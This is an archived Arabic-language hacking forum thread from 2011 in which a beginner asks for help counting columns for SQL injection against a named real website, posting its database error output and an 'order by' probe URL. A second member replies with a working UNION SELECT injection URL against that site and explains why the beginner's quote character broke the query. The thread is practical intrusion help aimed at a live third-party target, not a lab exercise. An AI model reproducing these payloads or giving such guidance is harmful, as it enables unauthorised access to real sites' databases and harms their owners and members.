:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   ممكن مساعدة بأيجاد العواميد في ثغرات السكيول (http://www.vbspiders.com/vb/showthread.php?t=56514)

Barhom Basri 05-17-2011 05:11 PM

ممكن مساعدة بأيجاد العواميد في ثغرات السكيول
 
السلام عليكم

كيف الصحة اخوان ؟ ان شاء الله بخير

اخواني الاعزاء اني مبتدأ بمجال الهكر

اعرف بعض الامور و لكن اذا جمعتها يمكن ان اقدر اخترق

المهم محتاج مساعدتكم بـ أيجاد العواميد بالمواقع المصابة بثغرة السكيول

..

انا بعرف انو اذا طلع مثل هيك


Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/5-web/5c/b0/swiss.org.au/public/www/member.php on line 10

Warning: Cannot modify header information - headers already sent by (output started at /home/5-web/5c/b0/swiss.org.au/public/www/member.php:10) in /home/5-web/5c/b0/swiss.org.au/public/www/member.php on line 10


يعني انه الموقع مصاب بثغرة السكيول صحيح ؟

حلو

انا بدي اعرف عدد العواميد المصابة

رابط الموقع المصاب
كود:

http://www.swiss.org.au/member.php?ID=20'
و الكود الي بستعمله هوة التالي

كود:

http://www.swiss.org.au/member.php?ID=20%27+order+by+10
انا حاولت اجد العواميد بالترتيب من 1 الى 36 بجرب و لكن نفس الخطاً ما عم يتغير

سؤالي يقول : هل طريقتي غلط في ايجاد العواميد ؟ او أنها صح و لكن هناك عواميد اكثر ؟

تحياتي

ChucK NoRRis 05-17-2011 09:51 PM

تم ايجاد عدد العواميد 25

كود:

http://www.swiss.org.au/member.php?ID=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
لقد بقي الخطا عندك لانك كتبت الامر Order by

مع الشحطة
'

ولذلك بقي خطا الاسكل قائما لانك لم تحذف الشحطة

انتبه في المرة القادمة !

Barhom Basri 05-17-2011 10:30 PM

شكراً لك اخي على المساعدة
متشكر جداً جداً ^^


الساعة الآن 05:33 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0